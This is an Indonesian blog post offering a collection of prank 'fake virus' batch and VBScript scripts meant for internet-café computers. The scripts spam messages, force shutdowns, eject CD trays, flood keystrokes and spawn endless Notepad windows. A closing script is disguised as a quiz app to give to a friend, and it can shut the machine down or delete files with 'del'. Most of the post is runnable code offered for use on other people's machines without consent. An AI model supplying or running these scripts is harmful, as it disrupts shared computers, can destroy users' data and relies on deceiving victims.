Pengikut

Kumpulan Script untuk Membuat Virus Palsu

Kali Ini saya aka Share Kumpulan Script untuk virus palsu, memang ini sangat menjahilkan, target script ini cocok untuk warnet-warnet yang ada di sekitar anda :D



1.message yang muncul terus menerus.
Code:
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT


2.bikin shutdown+message
Code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"
save namafile.BAT

3.Mainin Caps Lock button
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

4.buka tutup CD/DVD
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs

5.bikin vbscript buka melulu
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs
ket:di task manager full wscript yg lg running

6.teken tombol backspace mlulu
Code:
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7.otomatis ngetik "lu jelek banget sih" di notepad/word
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
save namafile.vbs

8.membuka notepad terus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.

9.otomatis buka notepad lalu ngetik apa yg Anda mau
Code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
save namafile.vbs
ket:
kata2 di atas di ganti2 aj sesuai selera temen2
angka2 di atas bisa di modif sendiri (durasi nongol notepad/ngetiknya)

Tambahan Script
dari script diatas temen2 kembangin aja lagi...misal kayak gini nih
Code:
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
nah script diatas save jadi quiz.bat kasih ke temen..
pura2 aj bilang ad aplikasi kuis...
ket di atas :
kalo pilih 1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama saja kayak pilihan 1



NB : Jangan Dicoba di PC sendiri. Saya tidak menanggung resiko dari artikel yang sudah saya tulis ini.

3 komentar

  1. hahahaha. cara yang bagus sob. perlu dicoba nih :D

    BalasHapus
  2. hahahaha...silakan dicoba...

    BalasHapus
  3. wkwkkwkw
    ngakak melulu gan..
    manteb manteb
    xixixi

    BalasHapus

Budayakan Berkomentar dan Dilarang SPAM.
Dilarang Mengisi kotak komentar dengan LINK atau Anchor Text

Terima Kasih

.
 

Mengenai Saya

Most Reading

Diberdayakan oleh Blogger.